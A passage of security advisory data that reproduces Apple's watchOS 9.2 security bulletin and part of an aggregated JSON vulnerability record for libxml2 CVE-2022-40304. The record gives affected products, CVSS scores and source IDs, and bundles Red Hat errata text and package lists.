Kernel Available for: Apple Watch Series 4 and later Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM
libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero
Safari Available for: Apple Watch Series 4 and later Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao Ramchandani
Software Update Available for: Apple Watch Series 4 and later Impact: A user may be able to elevate privileges Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions. CVE-2022-42849: Mickey Jin (@patch1t)
Weather Available for: Apple Watch Series 4 and later Impact: An app may be able to read sensitive location information Description: The issue was addressed with improved handling of caches. CVE-2022-42866: an anonymous researcher
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was addressed with improved memory handling. WebKit Bugzilla: 245466 CVE-2022-46691: an anonymous researcher
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may bypass Same Origin Policy Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 246783 CVE-2022-46692: KirtiKumar Anandrao Ramchandani
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: The issue was addressed with improved memory handling. CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. WebKit Bugzilla: 246942 CVE-2022-46696: Samuel Groß of Google V8 Security WebKit Bugzilla: 247562 CVE-2022-46700: Samuel Groß of Google V8 Security
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved checks. CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 247420 CVE-2022-46699: Samuel Groß of Google V8 Security WebKit Bugzilla: 244622 CVE-2022-42863: an anonymous researcher
Additional recognition
Kernel We would like to acknowledge Zweig of Kunlun Lab for their assistance.
Safari Extensions We would like to acknowledge Oliver Dunk and Christian R. of 1Password for their assistance.
WebKit We would like to acknowledge an anonymous researcher and scarlet for their assistance.
Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke NxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q 5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve vnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3 DNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2 GH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag piObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ sOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki PLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi ex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA FofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA W09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I= =DltD -----END PGP SIGNATURE-----
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.2"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.10.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.2"
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.2"
},
{
"_id": null,
"model": "manageability software development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "171173"
}
],
"trust": 0.6
},
"cve": "CVE-2022-40304",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2022-40304",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-40304",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-40304",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-1022",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:\n\nOpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:\n\nOpenShift API for Data Protection (OADP) enables you to back up and restore\napplication resources, persistent volume data, and internal container\nimages to external backup storage. OADP enables both file system-based and\nsnapshot-based backups for persistent volumes. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOADP-1056 - DPA fails validation if multiple BSLs have the same provider\nOADP-1150 - Handle docker env config changes in the oadp-operator\nOADP-1217 - update velero + restic to 1.9.5\nOADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed\nOADP-1289 - Restore partially fails with error \"Secrets \\\"deployer-token-rrjqx\\\" not found\"\nOADP-290 - Remove creation/usage of velero-privileged SCC\n\n6. 
Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified\n2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2023:0338-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0338\nIssue date: 2023-01-23\nCVE Names: CVE-2022-40303 CVE-2022-40304\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. 
Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-devel-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-devel-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\nlibxml2-devel-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-devel-2.9.13-3.el9_1.i686.rpm\nlibxml2-devel-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 
9):\n\nSource:\nlibxml2-2.9.13-3.el9_1.src.rpm\n\naarch64:\nlibxml2-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-2.9.13-3.el9_1.i686.rpm\nlibxml2-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-40303\nhttps://access.redhat.com/security/cve/CVE-2022-40304\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. Bugs fixed (https://bugzilla.redhat.com/):\n\n2171870 - CVE-2023-0923 odh-notebook-controller-container: Missing authorization allows for file contents disclosure\n\n5. 
JIRA issues fixed (https://issues.jboss.org/):\n\nRHODS-6123 - Update dsp repo to match upstream kfp-tekton repo\nRHODS-6136 - Verify status of manifests\nRHODS-6330 - Remove Openvino and Etcd images from quay for self-managed deployments\nRHODS-6779 - [Model Serving] fallback image for ovms is not published, leading to image pull errors in upgrade scenarios\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-12-13-8 watchOS 9.2\n\nwatchOS 9.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213536. \n\nAccounts\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to view sensitive user information\nDescription: This issue was addressed with improved data protection. \nCVE-2022-42843: Mickey Jin (@patch1t)\n\nAppleAVD\nAvailable for: Apple Watch Series 4 and later\nImpact: Parsing a maliciously crafted video file may lead to kernel\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46694: Andrey Labunets and Nikita Tarakanov\n\nAppleMobileFileIntegrity\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to bypass Privacy preferences\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2022-42865: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nCoreServices\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to bypass Privacy preferences\nDescription: Multiple issues were addressed by removing the\nvulnerable code. \nCVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of\nOffensive Security\n\nImageIO\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. 
\nCVE-2022-46693: Mickey Jin (@patch1t)\n\nIOHIDFamily\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2022-42864: Tommy Muir (@Muirey03)\n\nIOMobileFrameBuffer\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46690: John Aakerblom (@jaakerblom)\n\niTunes Store\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An issue existed in the parsing of URLs. This issue was\naddressed with improved input validation. \nCVE-2022-42837: an anonymous researcher\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2022-46689: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause kernel code execution\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year\nLab\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42845: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxml2\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An integer overflow was addressed through improved input\nvalidation. 
\nCVE-2022-40303: Maddie Stone of Google Project Zero\n\nlibxml2\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project\nZero\n\nSafari\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a website that frames malicious content may lead to\nUI spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2022-46695: KirtiKumar Anandrao Ramchandani\n\nSoftware Update\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to elevate privileges\nDescription: An access issue existed with privileged API calls. This\nissue was addressed with additional restrictions. \nCVE-2022-42849: Mickey Jin (@patch1t)\n\nWeather\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to read sensitive location information\nDescription: The issue was addressed with improved handling of\ncaches. \nCVE-2022-42866: an anonymous researcher\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 245521\nCVE-2022-42867: Maddie Stone of Google Project Zero\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory consumption issue was addressed with improved\nmemory handling. 
\nWebKit Bugzilla: 245466\nCVE-2022-46691: an anonymous researcher\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may bypass Same\nOrigin Policy\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 246783\nCVE-2022-46692: KirtiKumar Anandrao Ramchandani\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42852: hazbinhotel working with Trend Micro Zero Day\nInitiative\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nWebKit Bugzilla: 246942\nCVE-2022-46696: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 247562\nCVE-2022-46700: Samuel Gro\u00df of Google V8 Security\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs\n\u0026 DNSLab, Korea Univ. \n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 247420\nCVE-2022-46699: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 244622\nCVE-2022-42863: an anonymous researcher\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Zweig of Kunlun Lab for their\nassistance. \n\nSafari Extensions\nWe would like to acknowledge Oliver Dunk and Christian R. of\n1Password for their assistance. 
\n\nWebKit\nWe would like to acknowledge an anonymous researcher and scarlet for\ntheir assistance. \n\nInstructions on how to update your Apple Watch software are available\nat https://support.apple.com/kb/HT204641 To check the version on\nyour Apple Watch, open the Apple Watch app on your iPhone and select\n\"My Watch \u003e General \u003e About\". Alternatively, on your watch, select\n\"My Watch \u003e General \u003e About\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke\nNxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q\n5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve\nvnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3\nDNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2\nGH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag\npiObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ\nsOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki\nPLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi\nex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA\nFofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA\nW09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I=\n=DltD\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40304"
},
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-429438",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-40304",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "169857",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170318",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170754",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169824",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170555",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169620",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170955",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169732",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170097",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2023.0246",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1467",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5286",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6321",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5792.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0816",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1501",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5614",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1267",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0513",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5455",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1041",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1398",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "170753",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171173",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170752",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170317",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170316",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171043",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170899",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170312",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169858",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171017",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170315",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171040",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171260",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-429438",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-40304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170668",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
},
{
